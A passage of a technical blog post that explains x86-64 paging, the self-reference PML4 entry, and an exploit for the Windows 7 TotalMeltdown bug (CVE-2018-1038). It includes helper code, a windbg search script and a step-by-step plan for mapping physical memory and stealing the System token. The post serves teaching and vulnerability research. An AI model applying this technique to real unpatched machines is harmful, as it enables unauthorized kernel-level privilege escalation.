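print(is_canonical(0x0000800000000000))  # False, bit 47 set but not extended
```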

The first thing to do is to get the physical address of the base of the PML4 table, so we can add our PML4 index 0x1f5 to it. This address, as shown in the picture above, is in the CR3 register:


that's 0x187000; we add to it the PML4 index 0x1f5 times the size of an entry, which is 8 bytes, which gives 0x187fa8



we read what's in this PML4 entry (!dq is used to read a QWORD from a given physical address and the L parameter is used to show only 1 QWORD):


well that value is not aligned on page boundary? I haven't talked about this earlier, but each entry of the tables is an address to the next table (always aligned on page boundary), but also contains some flags.

src: Intel developer system programming manual

the flags are in the lower 12 bits and in the upper 16 bits, so we just clear them to get the physical address. However, mostly only the lower 12 bits are actually used as flags; there is only one flag in the upper 16 bits, XD (Execute Disable), and it is also reserved (must be set to 0) if IA32_EFER.NXE = 0 and the page is present, which makes most of the upper 16 bits reserved/ignored:

src: Intel developer system programming manual

You might notice from the picture above that the CR3 also contains flags. I didn't mention that before because in our case the CR3 has no flags set (as the .formats command above shows).

so we have 0x4000863 we clear the flags:


this is the PDP table base address; we add the PDP index * 8 (the index is 0, so the address is the same), read the entry and clear the flags:



the PD table base is 0x4001000 we add the PD index 0xc * 8, read the entry and clear the flags:



the PT base address is 0x580d000; we add the PT index 0xab * 8, read the entry and clear the flags:



Now 0x7ff6a000 is the physical address of the page we will add the 12 bits offset 0x40 to:



And that's it! we got the physical address of 0xfffffa80018ab040 which is 0x7ff6a040.
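The manual walk above can be replayed with a small Python sketch. The physical memory is faked with a dictionary: the table bases and the PML4 entry value 0x4000863 are the ones from the walk above, while the flag bits of the other three entries are assumptions made up for the example (only the addresses matter here). The sketch handles 4KiB pages only.

```python
PHYS_MASK = 0x000FFFFFFFFFF000  # bits 51..12: physical address of next table/page

# Fake physical memory: {physical address of entry: 8-byte entry value}.
phys = {
    0x187000 + 0x1f5 * 8: 0x4000863,    # PML4 entry (value from the post)
    0x4000000 + 0x0 * 8: 0x4001863,     # PDP entry (flags assumed)
    0x4001000 + 0xc * 8: 0x580d863,     # PD entry (flags assumed)
    0x580d000 + 0xab * 8: 0x7ff6a963,   # PT entry (flags assumed)
}


def walk(cr3, va, read_qword):
    """Translate va by walking PML4 -> PDP -> PD -> PT (4KiB pages only)."""
    table = cr3 & PHYS_MASK
    for shift in (39, 30, 21, 12):
        index = (va >> shift) & 0x1FF
        entry = read_qword(table + index * 8)
        if not entry & 1:                # bit 0 is the present/valid bit
            raise ValueError("entry not present")
        table = entry & PHYS_MASK        # clear the flags
    return table | (va & 0xFFF)          # add the 12-bit page offset


print(hex(walk(0x187000, 0xfffffa80018ab040, phys.__getitem__)))  # 0x7ff6a040
```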

We can verify the translation with the !vtop windbg command, which translates virtual addresses to physical addresses. The argument 0 means use the current process (System) context. The context matters because every process has its own PML4 table: if you translate an address belonging to one process using another process's PML4 table (and subsequently its other tables), the translation will be wrong. This is irrelevant for kernel addresses though, because they are mapped in the upper half of the PML4 table of every process.



seems our math is OK! now about the flags we can use the !pte command to translate the virtual address 0xfffffa80018ab040 and also show the flags:



those are the flags under each table base: V stands for valid, and K for a Supervisor/Kernel mode page (code running in ring3 can't access these pages; the opposite of this flag is the U (usermode) flag, which grants access to ring3 code), W stands for readable and writable (the opposite is R, which means read only). You can find all the flags in the !pte docs or in the Intel manual. You can also see that the table bases are the same as the ones we read from the entries during our translation process.

Self Ref Entry


The self ref entry trick, or self reference entry, is a trick osdevs use to access any entry in any of the 4 tables without any extra structures or custom code. All that is needed is to add a PML4 entry which points to the PML4 table itself, i.e. the entry contains the physical address of the PML4 table, just like the CR3 register.

how will this allow us to access any table? well here is an example:

consider the entry at index 266 in the PML4 of our imaginary os is a self ref entry, the PML4 table will be similar to this one:

relevant flags are in green: K stands for Supervisor/Kernel mode, U for usermode

if we want to edit the PML4 entry at index 188, we would build a virtual address with the following indexes, you can use @xpn's go script to do that:



the script is pretty straightforward, it puts each index at its right offset in the virtual address via left shifting with the right offset, then sign extend.
  • PML4 entry: self ref entry 266
  • PDP entry: 266
  • PD entry: 266
  • PT entry: 266
  • offset: 188*8
the virtual address of this would be: 0xFFFF8542A150A5E0.
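For reference, here is a rough Python equivalent of that address construction. It is a sketch of the same idea (shift each index into place, then sign extend), not @xpn's script, and the function name is made up:

```python
def build_va(pml4, pdp, pd, pt, offset):
    """Assemble a canonical 64-bit virtual address from its paging indexes."""
    va = (pml4 << 39) | (pdp << 30) | (pd << 21) | (pt << 12) | offset
    if va & (1 << 47):            # sign extend bit 47 into bits 63..48
        va |= 0xFFFF << 48
    return va


# Self ref entry 266 used at every level, offset of PML4 entry 188.
print(hex(build_va(266, 266, 266, 266, 188 * 8)))  # 0xffff8542a150a5e0
```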

If we access this address in our imaginary OS after adding the self ref entry at index 266 it would return the content of the entry at index 188 of the PML4 table. how? lets see:
  • first the MMU will read the PML4 entry at index 266 the entry is self ref entry it points to the PML4 base address, this is considered as the PDP base address.
  • then the MMU will read the PDP entry 266 in table with the base address it read before which will point again to the PML4 base. this is considered as the PD base address.
  • again the MMU will read entry 266, this time as the PD entry, which points back to the PML4 base once more. this is considered as the PT base address.
  • once again the PT index 266 is used with the PML4 base address which points to the very same PML4 base. this is considered as the base address of the physical page we are trying to access with the address.
  • 188*8 is the offset of the PML4 entry at index 188 (we have to multiply by 8 because the MMU will multiply by 8 itself only when dealing with table indexes but it does not do that with the last 12 bits the page offset which makes sense otherwise we wouldn't have access to the whole page), this is added to the base address the MMU read before, which is the base of PML4 table.
eventually the final address the MMU constructs is the physical address of the entry 188 in the PML4 table.
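To see the loop in action, here is a toy simulation in Python. The PML4 base 0x1000 and the flag value 0x3 are made-up values for our imaginary OS; the only thing that exists in this fake physical memory is the PML4 page itself, with its self ref entry at index 266.

```python
PHYS_MASK = 0x000FFFFFFFFFF000
PML4_BASE = 0x1000   # hypothetical physical address of the PML4 table
SELF_REF = 266

pml4 = [0] * 512
pml4[SELF_REF] = PML4_BASE | 0x3   # points back to the PML4, flags assumed


def read_qword(pa):
    """Read an entry from the only page that exists here: the PML4 table."""
    assert PML4_BASE <= pa < PML4_BASE + 0x1000
    return pml4[(pa - PML4_BASE) // 8]


def walk(cr3, va):
    table = cr3 & PHYS_MASK
    for shift in (39, 30, 21, 12):               # PML4, PDP, PD, PT
        entry = read_qword(table + ((va >> shift) & 0x1FF) * 8)
        table = entry & PHYS_MASK                # always the PML4 base again
    return table | (va & 0xFFF)


pa = walk(PML4_BASE, 0xFFFF8542A150A5E0)
print(hex(pa), pa == PML4_BASE + 188 * 8)  # 0x15e0 True
```

All four levels resolve to the same page, so the final physical address is simply the PML4 base plus the offset of entry 188.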

Since we can access any entry in any table that means besides being able to edit the PML4 table, we can also translate any usermode address to its physical address, lets try to translate 0x482e50 which is a usermode address of a chunk allocated with LocalAlloc().

first the indexes of the Virtual Address:




then we need to build a Virtual Address like this:
  • PML4 index: self ref entry: 0x1ED
  • PDP index: PML4 index of the address we want to translate: 0
  • PD index: PDP index of the address we want to translate: 0
  • PT index: PD index of the address we want to translate: 2
  • offset: PT index of the address we want to translate * 8: 0x82*8 = 0x410



which gives: 0xfffff68000002410, we read what's in this address:


in this case there are some upper flags, 0xA8 (the XD Execute Disable flag and the protection key, to be exact), meaning No Execute is enabled for this page. That is expected: LocalAlloc(), which is a wrapper around HeapAlloc(), allocates chunks on the heap, which is not executable due to DEP :]

PD entry (PDE) format in case of 4KiB page, src: Intel developer system programming manual

anyway clearing the upper and the lower flags gives: 0x101ad000, this is the physical address of the physical page this address translates to.

now we add the 12 bits offset 0xe50 to it: 0x101ad000 + 0xe50 = 0x101ade50, confirm using !vtop in windbg:
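The whole usermode lookup can be condensed into a short Python sketch. The function names are made up, and the raw PTE value in the example is hypothetical: only its 0xA8 top byte and the 0x101ad000 page address come from the steps above, the low flag bits are assumed.

```python
SELF_REF = 0x1ED
PHYS_MASK = 0x000FFFFFFFFFF000


def pte_address(va, self_ref=SELF_REF):
    """Virtual address at which the PTE of va is visible via the self ref entry."""
    # Shifting right by 9 moves every index down one level and turns the
    # PT index into a byte offset (index * 8); the self ref index goes on top.
    addr = ((va >> 9) & 0x7FFFFFFFF8) | (self_ref << 39)
    if addr & (1 << 47):
        addr |= 0xFFFF << 48
    return addr


def physical_from_pte(pte, va):
    """Clear the upper and lower flags, then add the 12-bit page offset."""
    return (pte & PHYS_MASK) | (va & 0xFFF)


va = 0x482e50
print(hex(pte_address(va)))                            # 0xfffff68000002410
print(hex(physical_from_pte(0xA8000000101AD867, va)))  # 0x101ade50
```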


The bug


Now that we understand both the paging mechanism and the self reference entry, we can explain TotalMeltdown (CVE-2018-1038). The self reference entry on Windows 7 is the entry at index 0x1ED. This entry is supposed to be (and was) accessible only by ring0 code (the Kernel), but with the patch for the Meltdown vulnerability Microsoft introduced this bug by setting the U (usermode) bit in this entry's flags.


This means that any usermode program can use this entry and access the memory it maps. As we know, it is a self ref entry and points to the base of the PML4 table, so code running at ring3 has access to the PML4 table/page (every page holds one table) and can add, edit or remove entries.

As we are looking for an LPE we will not DoS the system by corrupting the existing in-use entries. Instead we will add a new entry to the PML4 table with the U (usermode) bit set and map 31GiB of physical memory (you can map as much as you like, but 31GiB is more than enough for my testing VM, which has only 2GiB of RAM). Once we do that, we have arbitrary read/write over 31GiB of physical memory.

The Exploit


The initial exploit I wrote was quite simple: we map 31GiB of memory with the U (usermode) flag set, then we search the mapped memory for the System's EPROCESS and the exploit process's EPROCESS. We do that by looking for some identifiers like the process name ("System" for the System's EPROCESS) and the process id (4 for the System's EPROCESS); the exploit's process name and pid can be found at runtime. Once we find both EPROCESS structures, we copy the System's EPROCESS.Token to the exploit process's EPROCESS.Token.

Pretty straightforward, but the memory search takes ages, and to do the 31GiB mapping we need 32 physical pages (1 PDP table and 31 PD tables, no need for PTs because we use 2MiB large pages). The original exploit just overwrites whatever is in the range 0x10000-0x1F000, which crashes the system most of the time.

physical memory region 0x10000 probably being used

The Low Stub to the rescue!


The Low Stub is an undocumented structure named PROCESSOR_START_BLOCK. It can be found at the start of a page somewhere between 0x1000-0x100000 in physical memory (the lowest 1MiB). The Low Stub was covered by Alex Ionescu in his talk "Getting Physical with USB Type-C" at the RECON BRUSSELS 2017 conference; you can find the slides here.

From Alex Ionescu's talk slides:
This structure is used when resuming from ACPI Sleep Vector, as well as when initializing the Application Processors (APs).
this is what the structure looks like:

typedef struct _PROCESSOR_START_BLOCK {
    // The block starts with a jmp instruction to the end of the block
    FAR_JMP_16 Jmp;

    // Completion flag is set to non-zero when the target processor has
    // started
    ULONG CompletionFlag;

    // Pseudo descriptors for GDT and IDT.
    PSEUDO_DESCRIPTOR_32 Gdt32;
    PSEUDO_DESCRIPTOR_32 Idt32;
    
    // The temporary 32-bit GDT itself resides here.
    KGDTENTRY64 Gdt[PSB_GDT32_MAX + 1];
    
    // Physical address of the 64-bit top-level identity-mapped page table.
    ULONG64 TiledCr3;

    // Far jump target from Rm to Pm code
    FAR_TARGET_32 PmTarget;

    // Far jump target from Pm to Lm code
    FAR_TARGET_32 LmIdentityTarget;

    // Address of LmTarget
    PVOID LmTarget;

    // Linear address of this structure
    PPROCESSOR_START_BLOCK SelfMap;

    // Contents of the PAT msr
    ULONG64 MsrPat;

    // Contents of the EFER msr
    ULONG64 MsrEFER;

    // Initial processor state for the processor to be started
    KPROCESSOR_STATE ProcessorState;
} PROCESSOR_START_BLOCK;
the last member is of type _KPROCESSOR_STATE:


this is _KSPECIAL_REGISTERS:

and lastly _CONTEXT which is documented in winapi docs and also in windbg but its so long and doesn't fit in a screenshot:


typedef struct _CONTEXT {
  DWORD64 P1Home;
  DWORD64 P2Home;
  DWORD64 P3Home;
  DWORD64 P4Home;
  DWORD64 P5Home;
  DWORD64 P6Home;
  DWORD   ContextFlags;
  DWORD   MxCsr;
  WORD    SegCs;
  WORD    SegDs;
  WORD    SegEs;
  WORD    SegFs;
  WORD    SegGs;
  WORD    SegSs;
  DWORD   EFlags;
  DWORD64 Dr0;
  DWORD64 Dr1;
  DWORD64 Dr2;
  DWORD64 Dr3;
  DWORD64 Dr6;
  DWORD64 Dr7;
  DWORD64 Rax;
  DWORD64 Rcx;
  DWORD64 Rdx;
  DWORD64 Rbx;
  DWORD64 Rsp;
  DWORD64 Rbp;
  DWORD64 Rsi;
  DWORD64 Rdi;
  DWORD64 R8;
  DWORD64 R9;
  DWORD64 R10;
  DWORD64 R11;
  DWORD64 R12;
  DWORD64 R13;
  DWORD64 R14;
  DWORD64 R15;
  DWORD64 Rip;
  union {
    XMM_SAVE_AREA32 FltSave;
    NEON128         Q[16];
    ULONGLONG       D[32];
    struct {
      M128A Header[2];
      M128A Legacy[8];
      M128A Xmm0;
      M128A Xmm1;
      M128A Xmm2;
      M128A Xmm3;
      M128A Xmm4;
      M128A Xmm5;
      M128A Xmm6;
      M128A Xmm7;
      M128A Xmm8;
      M128A Xmm9;
      M128A Xmm10;
      M128A Xmm11;
      M128A Xmm12;
      M128A Xmm13;
      M128A Xmm14;
      M128A Xmm15;
    } DUMMYSTRUCTNAME;
    DWORD           S[32];
  } DUMMYUNIONNAME;
  M128A   VectorRegister[26];
  DWORD64 VectorControl;
  DWORD64 DebugControl;
  DWORD64 LastBranchToRip;
  DWORD64 LastBranchFromRip;
  DWORD64 LastExceptionToRip;
  DWORD64 LastExceptionFromRip;
} CONTEXT, *PCONTEXT;

as outlined in the slides of the talk, the Rip member of the CONTEXT struct points to the kernel entry (nt!KiSystemStartup), and CR3 in _KSPECIAL_REGISTERS, as you guessed, holds the base address of the kernel's PML4 table.

We need these two to write the exploit, because the self ref trick can't translate kernel mode addresses, and even if it could, our PML4 table has only a couple of kernel mode addresses mapped. This is due, ironically, to the Meltdown vulnerability patch aka KVAS, which separates the Kernel and Usermode PML4 tables (before KVAS every process had the kernel VAS mapped in the upper half of its PML4 table), so yeah, we need the Kernel's CR3 anyway.
We will use the Kernel's CR3 to translate its addresses; the kernel entry is used to get the Kernel's EPROCESS, as explained later on.

to find the low stub structure in windbg we use this hacky script:


.for (r $t0 = 0x1000; $t0 < 0x100000; r $t0 = $t0 + 0x1000) {r $t1=($pqwo(@$t0) & 0xffffffffffff00ff);.if (@$t1 == 0x00000001000600E9) {.printf "possibly found @ %p = %p\n", @$t0, @$t1;r $t1 = ($pqwo(@$t0 + 0x268) & 0xfffff80000000000);.if (@$t1 == 0xfffff80000000000) {.echo "1st check succeed";r $t3 = ($pqwo(@$t0 + 0x268));r $t2 = ($pqwo(@$t0+0xa0));.if(@$t2 == @cr3) {.echo "2nd check succeed";.printf "Kernel Entry: %p\n", @$t3;.printf "PML4: %p\n", @$t2;.break;}}}}

here is the output:


the extracted PML4 base 0x187000 is the same as CR3 register:


and for the extracted kernel entry address 0xfffff800028f7360:


well that's nt!KiSystemStartup which is the entry point of ntoskrnl.exe:


If you are wondering how the windbg script finds the Low Stub, it does so by looking at the first 8 bytes of every page for an encoded relative jmp instruction (opcode: 0xe9), which is the first member of the PROCESSOR_START_BLOCK structure:

typedef struct _PROCESSOR_START_BLOCK {
    // The block starts with a jmp instruction to the end of the block
    FAR_JMP_16 Jmp;
    ...
} PROCESSOR_START_BLOCK;
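The same search can be sketched in Python over a buffer holding the lowest 1MiB of physical memory. The signature, masks and offsets (0x268 and 0xa0) are copied from the windbg script above; the function name and the synthetic memory in the usage example are made up for illustration. Unlike the windbg script, an exploit does not know CR3 in advance, so the CR3 comparison is optional here.

```python
import struct

SIG_MASK = 0xFFFFFFFFFFFF00FF     # ignore the second byte of the jmp encoding
SIG_VALUE = 0x00000001000600E9    # first QWORD of the Low Stub, masked
KERNEL_MASK = 0xFFFFF80000000000  # kernel entry must look like a kernel address
ENTRY_OFF = 0x268                 # offsets taken from the windbg script
CR3_OFF = 0xA0


def find_low_stub(mem, expected_cr3=None):
    """Scan page starts in 0x1000-0x100000; return (page, kernel_entry, cr3)."""
    for page in range(0x1000, 0x100000, 0x1000):
        (first,) = struct.unpack_from("<Q", mem, page)
        if first & SIG_MASK != SIG_VALUE:
            continue
        (entry,) = struct.unpack_from("<Q", mem, page + ENTRY_OFF)
        if entry & KERNEL_MASK != KERNEL_MASK:
            continue
        (cr3,) = struct.unpack_from("<Q", mem, page + CR3_OFF)
        if expected_cr3 is not None and cr3 != expected_cr3:
            continue
        return page, entry, cr3
    return None


# Synthetic 1MiB of "physical memory" with a fake stub planted at 0x7000.
mem = bytearray(0x100000)
struct.pack_into("<Q", mem, 0x7000, 0x0000000100064DE9)
struct.pack_into("<Q", mem, 0x7000 + ENTRY_OFF, 0xfffff800028f7360)
struct.pack_into("<Q", mem, 0x7000 + CR3_OFF, 0x187000)
print([hex(x) for x in find_low_stub(mem)])
```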

the low stub structure is at 0x7000 we can check the disassembly of the first QWORD in windbg (up command disassembles physical address):


Now that we have both the Kernel's PML4 base address (CR3) and the exploit process's PML4 base address (using self ref), we can translate any Virtual Address to its physical address. It requires a good understanding of how paging works, but we can do it.

the fine exploit


Enough with the introductions. I believe we can now discuss what the exploit will look like and how it will take advantage of the Low Stub structure. This is how it is done:
  • add a new entry to the PML4 table of the exploit process.
  • LocalAlloc() the required 32 pages for mapping 31GiB of memory (1 PDP + 31 PD).
  • create a MMU() function which can translate any virtual address to physical address.
  • use the MMU() function to translate the virtual address of every page we got from LocalAlloc() to a physical address.
  • map 31GiB of physical memory using the pages allocated with LocalAlloc() with flag U (usermode) accessible.
  • find the Low Stub, save the CR3 of the Kernel and the Kernel Entry
  • fallback to raw memory search if Low Stub is not found
  • the MMU() function should be able to translate now the privileged Virtual Addresses (ring0) after we have the CR3 of the Kernel (the PML4 base) and 31GiB of physical memory mapped.
  • find the Kernel Entry (nt!KiSystemStartup) in physical memory.
  • load ntoskrnl.exe in user mode, PE parse it, get the offset of the entry and the offset of nt!PsInitialSystemProcess.
  • calculate the address of ntoskrnl.exe base (nt) in physical memory.
  • read nt!PsInitialSystemProcess.
  • traverse the EPROCESS doubly linked list using EPROCESS.ActiveProcessLinks.
  • find the EPROCESS of the parent process.
  • duplicate the System's token.

setup_paging()


This is the function which maps 31GiB of physical memory. How it is done is easy: once we have translated the virtual addresses of the 32 usermode allocated pages, we add a new entry to the PML4 table which points to the first page we have. Then we identity map the physical memory starting from address 0 using 1 PML4 entry (pointing to the first page from LocalAlloc()), 1 PDP table (the first page from LocalAlloc()), and 31 PD tables (the remaining 31 pages from LocalAlloc()), which is equal to 31 * 512 * 0x200000 (2MiB) = 31GiB. We use large paging (2MiB for each page instead of 4KiB) because it is easier and requires fewer physical pages to set up the tables, i.e. we don't need PT tables/pages.

relevant flags are in green: K stands for Supervisor/Kernel mode, U for usermode, L for large page

This diagram shows what the tables look like after running the exploit. As you can see, the self ref entry at 0x1ED points to the base of the PML4 table but has the U (usermode) flag, when it should have the K flag like all the entries in the upper half (the kernel half). In this example we injected an entry at index 427, i.e. at PML4 base + 427*8, which also has the U (usermode) flag set (otherwise we wouldn't be able to access the memory we mapped from ring3).

If you are wondering how we find a free PML4 entry, it's easy: we just read the content of the entry, and if it is NULL then it is not used; otherwise we skip it and check the next entry.

The PDP table is one of the usermode pages we got from LocalAlloc() and whose address we translated using MMU(). In this table we add 31 entries, each pointing to a single PD table, meaning 31 PD tables. These 31 PD tables also come from the usermode pages we got from LocalAlloc() and translated using MMU() (hence we need 32 pages allocated via LocalAlloc()). Each entry of these PD tables points to a 2MiB page in physical memory, starting from physical address 0.

We use 2MiB large pages (by setting the large page flag in the PD entry) so there is no need for PT tables. Originally every single PT table maps 2MiB (512 entries in a PT table * 4KiB (0x1000 bytes) page per entry = 0x200000 bytes (2MiB)) of physical memory; now that we use large pages we don't need the PT tables and thus we require fewer physical pages.
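Here is a minimal Python sketch of the table layout described above. It only computes what each table would contain, it does not touch any real memory, and it is not the exploit's code. The flag values are the standard x86-64 bits (Present, Read/Write, User/Supervisor, Page Size); the function name and the physical addresses of the 32 pages in the usage example are made up.

```python
P, RW, US, PS = 0x1, 0x2, 0x4, 0x80   # present, writable, usermode, large page
LARGE_PAGE = 0x200000                 # 2MiB


def build_mapping(pml4, page_phys, gib=31):
    """Fill 1 PDP + `gib` PD tables mapping physical memory from address 0.

    pml4:      list of 512 entries (the current PML4 content)
    page_phys: physical addresses of gib + 1 pages (1 PDP, then the PDs)
    Returns (index of the PML4 entry used, {table physical address: entries}).
    """
    assert len(page_phys) == gib + 1
    pdp_phys, pd_phys = page_phys[0], page_phys[1:]
    tables = {pdp_phys: [0] * 512}
    for i, pd in enumerate(pd_phys):
        tables[pdp_phys][i] = pd | P | RW | US          # PDP entry -> PD table
        tables[pd] = [((i * 512 + j) * LARGE_PAGE) | P | RW | US | PS
                      for j in range(512)]              # PD entry -> 2MiB page
    free = next(i for i in range(512) if pml4[i] == 0)  # first unused entry
    pml4[free] = pdp_phys | P | RW | US                 # PML4 entry -> PDP table
    return free, tables


pml4 = [0] * 512
pml4[0] = 0x2000867                                     # pretend entry 0 is in use
pages = [0x10000000 + i * 0x1000 for i in range(32)]    # hypothetical pages
index, tables = build_mapping(pml4, pages)
last = tables[pages[-1]][511] & 0x000FFFFFFFE00000
print(index, hex(last))  # 1 0x7bfe00000, the last 2MiB page below 31GiB
```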

If the CPU supports 1GiB pages and we were to use them (by setting the large page flag in the PDP entry) we wouldn't need either the PD tables or the PT tables, again because originally every PD table (and the 512 PT tables under it) maps 1GiB of physical memory (512 entries in the PD table * 1 PT table per entry = 512 * 2MiB per PT table = 512 * 0x200000 bytes = 0x40000000 bytes (1GiB)).

who knows probably at some point in the future, there will be 512GiB large page then again no need for PDP, PD and PT tables, because originally 1 PDP table (and 512 PD tables and 512*512 PT tables under it) maps 512GiB of physical memory.

MMU()


This is probably the most important function in the exploit. It translates both usermode and kernel mode Virtual Addresses to physical addresses: the usermode translation is done via the self ref entry, while the kernel mode translation is only possible after getting both the Kernel's CR3 and arbitrary read/write of physical memory, both of which we have. It also handles large pages (in which case the PT is not used).

It works just like explained in the previous sections, we have access to the physical memory and we know the base address of the PML4 table, so we can just read and clear the flags, use the next index, read then clear the flags, eventually we will get the physical address.

In case of usermode addresses the things are easier we can just use the self ref entry to access any entry in the paging tables as long as the address is valid and usermode accessible we can translate it using only the self ref entry.

There is an exception however, which kept crashing the exploit until I found out that I was trying to translate an address which uses large pages.
When large paging (usually 2MiB pages) is used, the large page flag is set in the flags of the PD entry and the PT is not used. In this case the translation is done only via PML4 -> PDP -> PD, then using both the PT index and the offset directly with the PD entry (the PT index is left shifted by 12).

0xfffffa80044a9060 is an example of an address mapped to a large page:


the PD entry (PDE) flags show L, which means a 2MiB large page is being used. To get the physical address we left shift the PT index 0xa9 by 12 and OR it with the PD entry 0x7D200000, which gives:


then we add the 12 bits offset 0x60:



our math says the physical address is: 0x7d2a9060, we can verify it with !vtop command:


the function does the same steps we did using windbg but in C.
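As a rough illustration of the large page case (in Python rather than C, and not the exploit's actual code), this is the extra check a page walk needs when it reaches the PD entry. The function name is made up, and the flag bits in the example PDE are assumed apart from the large page bit (0x80); the 0x7D200000 base is the one from the example above.

```python
LARGE_FLAG = 0x80                  # PS bit in a PD entry: 2MiB large page
MASK_2M = 0x000FFFFFFFE00000       # bits 51..21: base of the 2MiB page


def resolve_pd_entry(pde, va):
    """Return the physical address if the PDE maps a 2MiB page, else None.

    None means the PDE points to a PT and the walk has to continue there.
    """
    if pde & LARGE_FLAG:
        # The low 21 bits of va are (PT index << 12) | 12-bit offset.
        return (pde & MASK_2M) | (va & 0x1FFFFF)
    return None


pde = 0x7D200000 | 0xE3            # low flags assumed, large page bit set
print(hex(resolve_pd_entry(pde, 0xfffffa80044a9060)))   # 0x7d2a9060
print(resolve_pd_entry(0x580d863, 0xfffffa80018ab040))  # None, continue to the PT
```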

nt!PsInitialSystemProcess


nt!PsInitialSystemProcess is a global variable in the kernel (ntoskrnl.exe) which is exported, and points to the system's EPROCESS.



we can get its offset by first loading ntoskrnl.exe with LoadLibraryExW(), then using GetProcAddress(), then calculating its offset within ntoskrnl.exe (GetProcAddress((HMODULE)nt, "PsInitialSystemProcess") - LoadLibraryExW(L"ntoskrnl.exe", NULL, DONT_RESOLVE_DLL_REFERENCES)).

nt!KiSystemStartup on the other hand (whose address in kernel space we have, along with its physical address using MMU()) is not exported. Luckily for us it is the entry point of the ntoskrnl.exe image, which means its offset is in the optional header of the PE file, in AddressOfEntryPoint.

We can verify this using windbg and PE-bear:


windbg says the offset from nt!KiSystemStartup to the base of the nt image is 0x2a9360, now let's see in PE-bear:



PE-bear shows the same offset: 0x2a9360.

So we can just PE parse the loaded ntoskrnl.exe binary to get the offset and subtract it from the kernel entry to get the nt base address. Then we add the nt!PsInitialSystemProcess offset to get the address of that variable, and reading it gives us the System's EPROCESS.
What's left is easy: finding the parent's EPROCESS using the ActiveProcessLinks list, then patching its token.
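The address arithmetic boils down to a subtraction and an addition, sketched here in Python. The kernel entry and the entry point offset are the values from my testing VM shown above; the PsInitialSystemProcess offset in the example is a placeholder, not a real value, since the real one comes from GetProcAddress() at runtime. The function names are made up.

```python
def nt_base(kernel_entry_va, entry_point_rva):
    """Kernel image base = address of nt!KiSystemStartup - AddressOfEntryPoint."""
    return kernel_entry_va - entry_point_rva


def ps_initial_system_process_va(base, ps_rva):
    """Address of the nt!PsInitialSystemProcess variable (a pointer to EPROCESS)."""
    return base + ps_rva


base = nt_base(0xfffff800028f7360, 0x2a9360)
print(hex(base))  # 0xfffff8000264e000

PLACEHOLDER_RVA = 0x123456  # hypothetical, resolve the real offset at runtime
print(hex(ps_initial_system_process_va(base, PLACEHOLDER_RVA)))
```

The resulting address is a kernel virtual address, so it still has to go through MMU() before the pointer stored there (the System's EPROCESS) can be read from the mapped physical memory.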

Notes:

  • in this post I interpreted the PTEs as described by Intel in SDM, but in Windows world there is actually a special struct to represent this entry named nt!MMPTE_HARDWARE, and ofc these two representations do not conflict.

PoC


the exploit is available here.
